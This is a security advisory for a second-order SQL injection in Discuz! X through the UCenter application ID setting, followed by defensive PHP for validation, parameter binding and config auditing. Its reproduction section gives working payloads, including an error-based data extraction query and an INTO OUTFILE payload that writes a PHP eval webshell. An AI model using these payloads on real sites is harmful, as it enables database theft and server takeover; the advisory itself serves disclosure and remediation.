0x01 Vulnerability Description
All versions of Discuz! X contain a SQL injection vulnerability. The root cause is that source\admincp\admincp_setting.php, when processing $settingnew['uc'], does not fully filter the 'appid' parameter ($settingnew['uc']['appid']), which leads to a second-order (stored) SQL injection. Under certain conditions an attacker can exploit this vulnerability to gain access to the server.
0x02 Scope
The entire Discuz! X series, up to and including the latest release, Discuz! X3.4 R20191201.
0x03 Vulnerability Details
(1) At line 2571 of source\admincp\admincp_setting.php, the user-controllable parameter $settingnew['uc']['appid'] is written into the configuration file config\config_ucenter.php, replacing the value of the UC_APPID constant.
(2) At line 206 of uc_client\model\base.php, UC_APPID is concatenated directly into an SQL statement.
(3) Whenever a function that runs that query is called, the second-order injection is triggered.
0x04 Vulnerability Reproduction
(1) In the admin backend, under UCenter settings, enter 1' as the application ID.
(2) Visiting the home page then produces an SQL error, confirming that the injection is triggered.
(3) Further payloads can then be inserted for testing, for example:
1' and (updatexml(1,concat(0x7e,(select version()),0x7e),1));-- a
(4) Writing a webshell:
1' union select '<?php @eval($_POST[1]);?>' into outfile 'C:/phpStudy/PHPTutorial/WWW/shell.php';-- a
0x05 Remediation Advice
(1) Do not use a weak password for the admin backend.
(2) No official patch has been released yet; watch for official patch information.
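As an added example (not Discuz! code and not the official fix), the following PHP shows the defensive handling that sections 0x03 and 0x05 imply: the application ID is validated as a plain integer before it is written to config_ucenter.php, the lookup query binds it as an integer parameter instead of concatenating UC_APPID into the SQL string, and an audit helper flags a config_ucenter.php whose UC_APPID is no longer a bare integer (a sign the admin-side value was tampered with). The function names, the `applications` table and the exact define() format that Discuz! writes are assumptions.

```php
<?php
// Added example, not Discuz! code. Helper names, the table name and the
// define() format are assumptions made for illustration.

// Allow-list check: a UCenter application ID is a positive integer, so
// anything containing quotes, spaces or SQL fragments is rejected outright.
function validate_uc_appid($raw) {
    if (!is_string($raw) && !is_int($raw)) {
        return null;
    }
    $s = trim((string)$raw);
    // Length bound is an arbitrary sanity limit (assumption), so that
    // (int) casting cannot silently overflow on a huge digit string.
    if ($s === '' || !ctype_digit($s) || strlen($s) > 10) {
        return null;
    }
    return (int)$s;
}

// Build the config line with an integer literal, so no quote or SQL
// fragment can ever be persisted into config_ucenter.php.
function build_uc_appid_define($raw) {
    $appid = validate_uc_appid($raw);
    if ($appid === null) {
        throw new InvalidArgumentException('Invalid UCenter application ID');
    }
    return "define('UC_APPID', " . $appid . ");";
}

// Parameterised replacement for a concatenated query: the value is bound as
// an integer, so even a tampered constant cannot change the SQL structure.
function select_app_by_id(PDO $db, $appid) {
    $id = validate_uc_appid($appid);
    if ($id === null) {
        throw new InvalidArgumentException('Invalid UCenter application ID');
    }
    $stmt = $db->prepare('SELECT * FROM applications WHERE appid = :appid');
    $stmt->bindValue(':appid', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetch(PDO::FETCH_ASSOC);
}

// Audit: read the contents of an existing config_ucenter.php and report a
// UC_APPID that is not a plain integer, which indicates tampering.
function audit_uc_appid_config($contents) {
    if (!preg_match("/define\s*\(\s*'UC_APPID'\s*,\s*(.*?)\s*\)\s*;/", $contents, $m)) {
        return array('ok' => false, 'reason' => 'UC_APPID not found');
    }
    $value = trim($m[1], " \t'\"");
    if (validate_uc_appid($value) === null) {
        return array('ok' => false, 'reason' => 'UC_APPID is not a plain integer: ' . $m[1]);
    }
    return array('ok' => true, 'appid' => (int)$value);
}

// Usage with constructed sample input (not real config files):
$clean    = "<?php\ndefine('UC_APPID', '1');\n";
$tampered = "<?php\ndefine('UC_APPID', '1\\'');\n";   // the 1' value from 0x04
var_dump(audit_uc_appid_config($clean));     // ok => true, appid => 1
var_dump(audit_uc_appid_config($tampered));  // ok => false, reason => not a plain integer
var_dump(build_uc_appid_define('42'));       // define('UC_APPID', 42);
```

The audit helper is the check a defender can run today, before a patch exists: read config\config_ucenter.php and confirm UC_APPID is a bare number. The validation and parameter binding show the shape the eventual fix needs to take at both write time (admincp_setting.php) and query time (base.php), since filtering only one of the two sides still leaves a second-order path.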